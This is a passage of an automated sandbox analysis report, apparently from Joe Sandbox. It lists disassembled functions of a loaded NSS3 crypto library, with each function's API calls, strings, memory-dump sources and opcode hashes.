                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                              • String ID:
                                                              • API String ID: 3167935723-0
                                                              • Opcode ID: 40aa94820d5beb5cd39c94207454fa3d89bd1a4ef162c712212e451642e4b11f
                                                              • Instruction ID: bc4a4998a7c82165fc50d55b0b64b1ac60a8149726238b5a6895f929c79de37c
                                                              • Opcode Fuzzy Hash: 40aa94820d5beb5cd39c94207454fa3d89bd1a4ef162c712212e451642e4b11f
                                                              • Instruction Fuzzy Hash: EC61D871A08201AFFB105E65DC41F6BBAF9EF18785F494038FE099A2A6F761D910C7A0
                                                              Function 6D123D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D123440: PK11_GetAllTokens.NSS3 ref: 6D123481
                                                                • Part of subcall function 6D123440: PR_SetError.NSS3(00000000,00000000), ref: 6D1234A3
                                                                • Part of subcall function 6D123440: TlsGetValue.KERNEL32 ref: 6D12352E
                                                                • Part of subcall function 6D123440: EnterCriticalSection.KERNEL32(?), ref: 6D123542
                                                                • Part of subcall function 6D123440: PR_Unlock.NSS3(?), ref: 6D12355B
                                                              • TlsGetValue.KERNEL32 ref: 6D123D8B
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D123D9F
                                                              • PR_Unlock.NSS3(?), ref: 6D123DCA
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D123DE2
                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D123E4F
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • TlsGetValue.KERNEL32 ref: 6D123E97
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D123EAB
                                                              • PR_Unlock.NSS3(?), ref: 6D123ED6
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D123EEE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                              • String ID:
                                                              • API String ID: 2554137219-0
                                                              • Opcode ID: 6a879b0b111732afc830d0027f3151a6cd6b2b74f85ff8937b6328832e7f1585
                                                              • Instruction ID: 677385d6c2a2f6f6c76cb9edfccfa9fcd7e1cfe565bde9dcfe8380f4e6cd8b64
                                                              • Opcode Fuzzy Hash: 6a879b0b111732afc830d0027f3151a6cd6b2b74f85ff8937b6328832e7f1585
                                                              • Instruction Fuzzy Hash: EA515A759042018FEB125F68EC4472B73B4FF55728F06412CEE0947229EBB2E996CBD1
                                                              Function 6D0D2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ZAlloc_Util.NSS3(FA536EE9), ref: 6D0D2C5D
                                                                • Part of subcall function 6D130D30: calloc.MOZGLUE ref: 6D130D50
                                                                • Part of subcall function 6D130D30: TlsGetValue.KERNEL32 ref: 6D130D6D
                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6D0D2C8D
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D0D2CE0
                                                                • Part of subcall function 6D0D2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6D0D2CDA,?,00000000), ref: 6D0D2E1E
                                                                • Part of subcall function 6D0D2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6D0D2E33
                                                                • Part of subcall function 6D0D2E00: TlsGetValue.KERNEL32 ref: 6D0D2E4E
                                                                • Part of subcall function 6D0D2E00: EnterCriticalSection.KERNEL32(?), ref: 6D0D2E5E
                                                                • Part of subcall function 6D0D2E00: PL_HashTableLookup.NSS3(?), ref: 6D0D2E71
                                                                • Part of subcall function 6D0D2E00: PL_HashTableRemove.NSS3(?), ref: 6D0D2E84
                                                                • Part of subcall function 6D0D2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6D0D2E96
                                                                • Part of subcall function 6D0D2E00: PR_Unlock.NSS3 ref: 6D0D2EA9
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0D2D23
                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6D0D2D30
                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6D0D2D3F
                                                              • free.MOZGLUE(00000000), ref: 6D0D2D73
                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6D0D2DB8
                                                              • free.MOZGLUE ref: 6D0D2DC8
                                                                • Part of subcall function 6D0D3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0D3EC2
                                                                • Part of subcall function 6D0D3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D0D3ED6
                                                                • Part of subcall function 6D0D3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D0D3EEE
                                                                • Part of subcall function 6D0D3E60: PR_CallOnce.NSS3(6D232AA4,6D1312D0), ref: 6D0D3F02
                                                                • Part of subcall function 6D0D3E60: PL_FreeArenaPool.NSS3 ref: 6D0D3F14
                                                                • Part of subcall function 6D0D3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D0D3F27
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                              • String ID:
                                                              • API String ID: 3941837925-0
                                                              • Opcode ID: 581a4e9882298c3159351dbcb47f217d9c1f02d70410e25eeae586325f63590b
                                                              • Instruction ID: 3530dd019edcbecb81065a77a0abdf7c7b2867dfbd2910f1d82f9f45c555469c
                                                              • Opcode Fuzzy Hash: 581a4e9882298c3159351dbcb47f217d9c1f02d70410e25eeae586325f63590b
                                                              • Instruction Fuzzy Hash: 8F51CD71A083129FFBA19E78DC81B2B77E5EF94708F05042AFD5987250E731E811DB92
                                                              Function 6D0D7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D0D40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6D0D3F7F,?,00000055,?,?,6D0D1666,?,?), ref: 6D0D40D9
                                                                • Part of subcall function 6D0D40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6D0D1666,?,?), ref: 6D0D40FC
                                                                • Part of subcall function 6D0D40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6D0D1666,?,?), ref: 6D0D4138
                                                              • PR_GetCurrentThread.NSS3 ref: 6D0D7CFD
                                                                • Part of subcall function 6D199BF0: TlsGetValue.KERNEL32(?,?,?,6D1E0A75), ref: 6D199C07
                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6D1F9030), ref: 6D0D7D1B
                                                                • Part of subcall function 6D12FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6D0D1A3E,00000048,00000054), ref: 6D12FD56
                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6D1F9048), ref: 6D0D7D2F
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6D0D7D50
                                                              • PR_GetCurrentThread.NSS3 ref: 6D0D7D61
                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6D0D7D7D
                                                              • free.MOZGLUE(?), ref: 6D0D7D9C
                                                              • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6D0D7DB8
                                                              • PR_SetError.NSS3(FFFFE023,00000000), ref: 6D0D7E19
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                              • String ID:
                                                              • API String ID: 70581797-0
                                                              • Opcode ID: 230ccd0fb40b66082883268dd914792ab7f9612b12039e414c0370d970f7910e
                                                              • Instruction ID: 289d5d9bb247d5321565700c7e53f0e4b5b59db153a6b6cdd5a0f85faf82c221
                                                              • Opcode Fuzzy Hash: 230ccd0fb40b66082883268dd914792ab7f9612b12039e414c0370d970f7910e
                                                              • Instruction Fuzzy Hash: 9F41F472D0431A9BFB409E699C41B7F33B8AF84258F060026ED1BAB251E770E919C7A1
                                                              Function 6D134DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6D13536F,00000022,?,?,00000000,?), ref: 6D134E70
                                                              • PORT_ZAlloc_Util.NSS3(00000000), ref: 6D134F28
                                                              • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6D134F8E
                                                              • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6D134FAE
                                                              • free.MOZGLUE(?), ref: 6D134FC8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                              • String ID: %s=%c%s%c$%s=%s
                                                              • API String ID: 2709355791-2032576422
                                                              • Opcode ID: 5559f91079d8dc22e76adb0b1e870a202e133f700ba92fcf1c8d6dba8a9cae7c
                                                              • Instruction ID: 26f0b0d5efd1c553c44272ce09e7ae3ede8070117a84aa0998c027ddd68c5c6d
                                                              • Opcode Fuzzy Hash: 5559f91079d8dc22e76adb0b1e870a202e133f700ba92fcf1c8d6dba8a9cae7c
                                                              • Instruction Fuzzy Hash: 7E514B21A8816B8BEB01CA6DC4907FF7BF5AF5A300F0B4075E894A7349D3BB88458791
                                                              Function 6D077D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D077E27
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D077E67
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6D077EED
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D077F2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: _byteswap_ulongsqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 912837312-598938438
                                                              • Opcode ID: fa2a902e6272cdd16eb456df493393002f620298cbb2034c3d97d46d8872aa17
                                                              • Instruction ID: 9ad900cd448fa7be6a1cc2cbc29166d3015241ce1f89ef95eb359c6bff64fe8b
                                                              • Opcode Fuzzy Hash: fa2a902e6272cdd16eb456df493393002f620298cbb2034c3d97d46d8872aa17
                                                              • Instruction Fuzzy Hash: B961AC74E442069FEB25CF28C890B6A37A2FF89344F1584A8ED099F352D771EC51CBA5
                                                              Function 6D10ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6D10ACE6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D10AD14
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D10AD23
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D10AD39
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                              • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                              • API String ID: 332880674-3521875567
                                                              • Opcode ID: 5f37273c4c6c3bd1d43055935395d3c5522efdc676cfaa70ce012f23c5f63602
                                                              • Instruction ID: 4291bf1d36ee2226683ecb0333208a77d533b4c489cf75dd1b1549cb510cc550
                                                              • Opcode Fuzzy Hash: 5f37273c4c6c3bd1d43055935395d3c5522efdc676cfaa70ce012f23c5f63602
                                                              • Instruction Fuzzy Hash: 2F2125B45001049FDB20AB65EE8CF2B33B5AB8230DF074024F6099B116DFB49845CBE2
                                                              Function 6D1A4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D1A4DC3
                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D1A4DE0
                                                              Strings
                                                              • misuse, xrefs: 6D1A4DD5
                                                              • invalid, xrefs: 6D1A4DB8
                                                              • API call with %s database connection pointer, xrefs: 6D1A4DBD
                                                              • %s at line %d of [%.10s], xrefs: 6D1A4DDA
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D1A4DCB
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                              • API String ID: 632333372-2974027950
                                                              • Opcode ID: 5446cd921d759ab0f52cf5cbec37515365e4cd41bdcc811f90209f908d0a4c68
                                                              • Instruction ID: d63dcabf6c6f4b6e6db6d2997ac41de91deedd8544a0ee3767d507916ea4e1a0
                                                              • Opcode Fuzzy Hash: 5446cd921d759ab0f52cf5cbec37515365e4cd41bdcc811f90209f908d0a4c68
                                                              • Instruction Fuzzy Hash: ECF05919E4862D2BEB005014DC21FB23B955F39324F4A00B0FE0CBB157DA4598408280
                                                              Function 6D1A4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D1A4E30
                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D1A4E4D
                                                              Strings
                                                              • misuse, xrefs: 6D1A4E42
                                                              • invalid, xrefs: 6D1A4E25
                                                              • API call with %s database connection pointer, xrefs: 6D1A4E2A
                                                              • %s at line %d of [%.10s], xrefs: 6D1A4E47
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D1A4E38
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                              • API String ID: 632333372-2974027950
                                                              • Opcode ID: 3abe27a38286937e86b8577354c4444e9e74ec7028f69bc63b27432ae5f76d0a
                                                              • Instruction ID: 5122d86eecb9a25e97e2fabeacfa4dd105ad3dd8d3c86f550e507feb0573b653
                                                              • Opcode Fuzzy Hash: 3abe27a38286937e86b8577354c4444e9e74ec7028f69bc63b27432ae5f76d0a
                                                              • Instruction Fuzzy Hash: 91F02719EC8A2D2BEB105028DC25FF337C59B39322F4E00B1EB1D67297DB8D9C605291
                                                              Function 6D110C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_SetError.NSS3(00000000,00000000,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?,?,00000000,?,?), ref: 6D110CB3
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?), ref: 6D110DC1
                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?), ref: 6D110DEC
                                                                • Part of subcall function 6D130F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6D0D2AF5,?,?,?,?,?,6D0D0A1B,00000000), ref: 6D130F1A
                                                                • Part of subcall function 6D130F10: malloc.MOZGLUE(00000001), ref: 6D130F30
                                                                • Part of subcall function 6D130F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D130F42
                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?), ref: 6D110DFF
                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6D111444,?,00000001,?,00000000), ref: 6D110E16
                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?), ref: 6D110E53
                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?,?,00000000), ref: 6D110E65
                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?), ref: 6D110E79
                                                                • Part of subcall function 6D121560: TlsGetValue.KERNEL32(00000000,?,6D0F0844,?), ref: 6D12157A
                                                                • Part of subcall function 6D121560: EnterCriticalSection.KERNEL32(?,?,?,6D0F0844,?), ref: 6D12158F
                                                                • Part of subcall function 6D121560: PR_Unlock.NSS3(?,?,?,?,6D0F0844,?), ref: 6D1215B2
                                                                • Part of subcall function 6D0EB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6D0F1397,00000000,?,6D0ECF93,5B5F5EC0,00000000,?,6D0F1397,?), ref: 6D0EB1CB
                                                                • Part of subcall function 6D0EB1A0: free.MOZGLUE(5B5F5EC0,?,6D0ECF93,5B5F5EC0,00000000,?,6D0F1397,?), ref: 6D0EB1D2
                                                                • Part of subcall function 6D0E89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6D0E88AE,-00000008), ref: 6D0E8A04
                                                                • Part of subcall function 6D0E89E0: EnterCriticalSection.KERNEL32(?), ref: 6D0E8A15
                                                                • Part of subcall function 6D0E89E0: memset.VCRUNTIME140(6D0E88AE,00000000,00000132), ref: 6D0E8A27
                                                                • Part of subcall function 6D0E89E0: PR_Unlock.NSS3(?), ref: 6D0E8A35
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                              • String ID:
                                                              • API String ID: 1601681851-0
                                                              • Opcode ID: 87fd0f849d18f01d86e20ca50288f459c552c3ada5fb1ff2d09dda5841d192ec
                                                              • Instruction ID: 857d3cec6e3ef146f2c79fce549c54b081adfff3573dfec4909c0f8469b21ab5
                                                              • Opcode Fuzzy Hash: 87fd0f849d18f01d86e20ca50288f459c552c3ada5fb1ff2d09dda5841d192ec
                                                              • Instruction Fuzzy Hash: 6651C3F6D082015FFB109F65DC81A7B37A8AF55258F160074FD099B316FBB2ED2186A2
                                                              Function 6D0E9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D0E8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6D0F0715), ref: 6D0E8859
                                                                • Part of subcall function 6D0E8850: PR_NewLock.NSS3 ref: 6D0E8874
                                                                • Part of subcall function 6D0E8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6D0E888D
                                                              • PR_NewLock.NSS3 ref: 6D0E9CAD
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
